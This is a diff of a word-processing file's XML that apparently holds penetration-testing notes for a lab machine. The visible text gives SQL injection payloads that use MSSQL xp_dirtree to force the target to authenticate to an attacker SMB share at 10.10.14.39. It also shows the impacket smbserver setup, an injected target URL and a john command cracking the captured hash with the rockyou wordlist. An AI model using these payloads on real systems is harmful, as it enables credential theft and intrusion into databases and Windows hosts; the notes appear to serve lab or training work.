-        <w:t>hello ';  EXEC sys.xp_dirtree  '\\10.10.14.39\TEST\cNukPTxEfp',1,1 --</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">or </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>hello ';  EXEC sys.xp_dirtree  '</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="InternetLink"/>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>\\10.10.14.39\TEST\cNukPTxEfp</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>'  --</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>#pay attention to single quote instead of double</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>or</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>hello ';  use master; EXEC master.sys.xp_dirtree  '\\10.10.14.39\TEST\cNukPTxEfp',1,1 --</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">or </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>hello ';  EXEC master.sys.xp_dirtree  '\\10.10.14.39\TEST\cNukPTxEfp',1,1 --</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:b w:val="false"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
@@ -10924,13 +11298,434 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:t xml:space="preserve">*First on kali </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>python /opt/impacket/examples/smbserver.py test .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">*Second on vulnerable host </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>hello ';  EXEC sys.xp_dirtree  '\\10.10.14.39\TEST\cNukPTxEfp',1,1 --</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">or </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>hello ';  EXEC sys.xp_dirtree  '</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="InternetLink"/>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>\\10.10.14.39\TEST\cNukPTxEfp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>'  --</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>#pay attention to single quote instead of double</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>or</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>hello ';  use master; EXEC master.sys.xp_dirtree  '\\10.10.14.39\TEST\cNukPTxEfp',1,1 --</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">or </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>hello ';  EXEC master.sys.xp_dirtree  '\\10.10.14.39\TEST\cNukPTxEfp',1,1 --</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -11031,30 +11826,8 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>john -w=/usr/share/wordlists/rockyou.txt hash.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:b w:val="false"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
@@ -11081,6 +11854,41 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
+        <w:t>john -w=/usr/share/wordlists/rockyou.txt hash.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -11154,7 +11962,21 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="3465A4"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -11182,7 +12004,7 @@
       <w:hyperlink r:id="rId31">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel9"/>
             <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
             <w:b/>
             <w:bCs/>
@@ -11193,6 +12015,7 @@
             <w:sz w:val="24"/>
             <w:szCs w:val="24"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
             <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
           </w:rPr>
           <w:t>http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18; EXEC sys.xp_dirtree '\\10.10.14.39\TEST\cNukPTxEfp' --</w:t>
@@ -11230,30 +12053,8 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>hash format: user:password:domain</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
           <w:b w:val="false"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
@@ -11280,120 +12081,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>-Windows cmd : copy file from remote share (SMB)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">*smbserver should be running on kali, then </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
